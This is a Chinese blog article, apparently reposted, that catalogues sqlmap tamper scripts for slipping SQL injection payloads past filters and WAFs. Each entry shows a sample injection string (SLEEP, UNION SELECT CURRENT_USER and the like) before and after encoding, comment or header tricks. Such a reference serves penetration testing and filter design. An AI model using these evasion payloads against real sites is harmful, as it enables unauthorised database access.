sqlmap常用tamper汇总及使用指导

这篇具有很好参考价值的文章主要介绍了sqlmap常用tamper汇总及使用指导。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

遍历tamper脚本
GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester

一、编码:

1.1 base64encode.py
base64编码所有字符
("1' AND SLEEP(5)#")
替换后
'MScgQU5EIFNMRUVQKDUpIw=='
1.2 charencode.py
URL编码
SELECT FIELD FROM%20TABLE
替换后
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
已经测试过的数据库:Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
1.3 chardoubleencode.py
二次URL编码(不处理已编码的)
SELECT FIELD FROM%20TABLE
替换后
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
1.4 charunicodeencode.py
unicode编码
SELECT FIELD%20FROM TABLE
替换后
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
  • 必要条件:ASP,ASP.NET
  • 使用数据库:Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3
1.5 charunicodeescape.py
url解码中的%篡改成\\
1.6 htmlencode.py
html编码

二、空格过滤

2.1 overlongutf8.py
空格替换为%C0%A0
2.2 space2comment.py
空格替换成/**/
'SELECT id FROM users'
替换后
'SELECT/**/id/**/FROM/**/users'
2.3 space2morecomment.py
空格替换成/**_**/
已经测试过的数据库:mysql5.0 and 5.5
'SELECT id FROM users'
替换后
'SELECT/**_**/id/**_**/FROM/**_**/users'
2.4 space2mssqlblank.py
将空格替换成随机的以下字符(mssql)
'%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A'
'SELECT id FROM users'
替换后
'SELECT%0Did%0DFROM%04users'
适用数据库:Microsoft SQL Server
已经测试过的数据库:sql server 2000 sql server 2005
2.5 space2mssqlhash.py
将空格替换成%23%0A
适用数据库:mssql mysql
2.6 space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
SELECT id FROM users
替换后
SELECT%0Bid%0BFROM%A0users
2.7 space2mysqldash.py
作用:替换空格字符(' ')(' – ')后跟一个破折号注释一个新行(' n')
('1 AND 9227=9227')
替换后
'1--%0AAND--%0A9227=9227'
2.8 space2plus.py
将空格替换成+
('SELECT id FROM users')
替换后
'SELECT+id+FROM+users'
2.9 space2randomblank.py
将空格替换成以下随机的字符
"%09", "%0A", "%0C", "%0D"
测试过的数据库:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
2.10 space2hash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
'1 AND 9227=9227'
替换后
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

三、union关键词替换

3.1 0eunion.py
使用e0UNION替换UNION
已经测试过的数据库:Mysql,Mssql
3.2 dunion.py
将UNION换成DUNION
必要条件:Oracle
3.3 misunion.py
UNION篡改为-.1UNION
3.4 unionalltonnion.py
将union all select 替换成union select
'-1 UNION ALL SELECT'
替换后
'-1 UNION SELECT'
3.5 unionalltounion.py
替换UNION ALL SELECT 为UNION SELECT
('-1 UNION ALL SELECT')
替换后
'-1 UNION SELECT'

四、符号

4.1 apostrophemask.py
把双引号替换为单引号,将'替换成UTF-8url编码的%EF%BC%87
4.2 apostrophenullencode.py
将'替换成%00%27
("1 AND '1'='1")
替换后
'1 AND %00%271%00%27=%00%271'
4.3 between.py
将>字符替换为NOT BETWEEN 0 AND
将=字符替换为BETWEEN # AND # (这个#看下面的例子)
'1 AND A = B--'
替换后
'1 AND A BETWEEN B AND B--'
  • 已经测试过的数据库:Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
4.4 greatest.py
使用greatest替换>    
('1 AND A > B')
替换后
'1 AND GREATEST(A,B+1)=A'
  • 已经测试过的数据库:MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
4.5 symboliclogical.py
将and和or的逻辑运算符分别替换为(&&和||)
"1 AND '1'='1"
替换后
"1 %26%26 '1'='1"
4.6 bluecoat.py
将sql语句后的空格字符替换为%09,LIKE替换字符=
已经测试过的数据库:mysql5.1之前
4.7 commalesslimit.py
替换字符的位置
'LIMIT 2, 3'
替换后
'LIMIT 3 OFFSET 2'
必要条件:mysql
已经测试过的数据库:mysql5.0,mysql5.5
4.8 concat2concatws.py
将concat(a,b)替换成concat_ws(mid(char(0),0,0),a,b)
'CONCAT(1,2)'
替换后
CONCAT_WS(MID(CHAR(0),0,0),1,2)
必要条件:mysql
已经测试过的数据库:mysql5.0
4.9 equaltolike.py
将=篡改成LIKE
SELECT * FROM users WHERE id=1
替换成
SELECT * FROM users WHERE id LIKE 1
已经测试过的数据库:Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
4.10 equaltorlike.py
将=篡改成RLIKE
4.11 ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。
('IFNULL(1, 2)')
替换后
'IF(ISNULL(1),2,1)'

五、特殊绕过

5.1 randomcase.py
随机大小写
'function()'
替换后
'FuNcTiOn()'
5.2 lowercase.py
将字符转换为小写
5.3 uppercase.py
将关键字符替换成大写
'insert'
替换后
'INSERT'
  • 已经测试过的数据库:Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
5.4 multiplespaces.py
在sql关键字周围添加多个空格
'1 UNION SELECT foobar'
替换后
'1     UNION     SELECT     foobar'
5.5 percentage.py
在每一个字符前面添加一个百分比符号,asp语言允许
'SELECT FIELD FROM TABLE'
替换后
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
5.6 sp_password.py
将sp_password附加到有效负载的末尾,用来混淆
'1 AND 9227=9227-- '
替换后
'1 AND 9227=9227-- sp_password'
必要条件:mssql
5.7 varnish.py
附加一个HTTP头来 X-originating-IP = "127.0.0.1" 来绕过防火墙
5.8 xforwardedfor.py
附加一个虚假的HTTP头“X-Forwarded-For”
headers = kwargs.get("headers", {})headers["X-Forwarded-For"] = randomIP()return payload
5.9 unmagicquotes.py
作用:宽字符绕过 GPC  addslashes
1′ AND 1=1
替换后
1%bf%27 AND 1=1--
5.10 appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码(Microsoft Access数据库)
('1 AND 1=1')
替换后
'1 AND 1=1%00'

六、注释绕过

6.1 randomcomments.py
用/**/分割sql关键字
'INSERT'
替换成
'I/**/NS/**/ERT'
6.2 halfversionedmorekeywords.py
在每个关键字之前添加mysql版本注释
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
替换成
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
必要条件:mysql<5.1
已经测试过的数据库:mysql4.0.18,5.0.22
6.3 modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
('1 AND 2>1--')
替换后
'1 /*!30874AND 2>1*/--'
6.4 modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
('1 AND 2>1--')
替换后
'1 /*!00000AND 2>1*/--'
6.5 versionedkeywords.py
作用:对不是函数的关键字进行注释绕过  
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
替换后
1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#
6.6 versionedmorekeywords.py
作用:注释每一个关键字包括函数关键字
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
替换后
1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#

文章来源地址https://www.toymoban.com/news/detail-753901.html

到了这里,关于sqlmap常用tamper汇总及使用指导的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新

    官网下载地址:https://github.com/sqlmapproject/sqlmap sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问

    2024年04月10日
    浏览(41)
  • 【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 (也可以拿自己的环镜来玩,我是用pikachu靶场来演示的) 【网路安全 --- pikachu靶场安装】超详细的pikachu靶场安装教程(提供靶场代码及工具)_网络安全_Ai

    2024年02月08日
    浏览(53)
  • 渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

    环境:对某网站进行渗透测试。 (PHP+Mysql开发的网站,用于WEB漏洞教学和检测的) 工具:sqlmap(Kali Linux中自带or官网下载Windows版) 此次实验所涉及的sqlmap参数: 一、信息收集 二、漏洞挖掘 (1)判断网站是否存在sql注入漏洞 使用工具,sqlmap: sqlmap -u \\\"目标网站地址\\\" --ba

    2024年02月15日
    浏览(46)
  • 【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了

    一、sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可以根据

    2024年02月10日
    浏览(62)
  • SQL注入工具之SQLmap入门操作

    了解SQLmap 基础操作 SQLmap 是一款自动化的 SQL 注入工具,可以用于检测和利用SQL注入漏洞。 以下是 SQLmap 的入门操作步骤: 1.下载 SQLmap :可以从官方网站(https://sqlmap.org/)下载最新版本的SQLmap。 2.打开终端 :在终端中进入 SQLmap 所在的目录。 3.输入命令 :使用以下命令运行

    2024年02月21日
    浏览(46)
  • SQL注入 - sqlmap联动burpsuite之burp4sqlmap++插件

    目录 sqlmap和burpsuite介绍 sqlmap4burp++介绍 sqlmap4burp++的使用 小插曲:sqlmap报错文件不存在怎么办? SqlMap sqlmap 是一款自动化检测与利用SQL注入漏洞的免费开源工具。 可用于检测利用五种不同类型的SQL注入: 布尔型盲注(Boolean-based blind)即可以根据返回页面判断条件真假的注入

    2024年03月12日
    浏览(62)
  • 在kali linux里利用SQLmap实现SQL注入

    SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不

    2024年02月04日
    浏览(49)
  • sqlmap 是一个自动化的 sql 注入渗透工具

    一.介绍 sqlmap 是一个自动化的 sql 注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap 还提供了很多脚本.但在实践测试的时候基本用不上.用于检测和利用 Web 应用程序中的 SQL 注入漏洞。它自动化了识别和利用 SQL 注入漏洞的过程,并可用于执

    2024年01月23日
    浏览(51)
  • 【SQL注入】SQLMAP v1.7.11.1 汉化版

    【SQL注入】SQLMAP v1.7.11.1 汉化版 SQLMAP是一款开源的自动化SQL注入工具,用于扫描和利用Web应用程序中的SQL注入漏洞。它在安全测试领域被广泛应用,可用于检测和利用SQL注入漏洞,以验证应用程序的安全性。 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在用户输入的

    2024年01月19日
    浏览(42)
  • WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF

    访问使用阿里云搭建的网站(存在自带的阿里云盾)。 可以看到此时网站可以正常访问,可以进行正常注入。 使用工具进行注入。 可以看到在使用工具注入没多久后便返回了不存在注入点的信息。 因为经常会用到SQLMAP这款工具对注入点进行检测,在遇到WAF时,如果还想继续

    2024年02月12日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包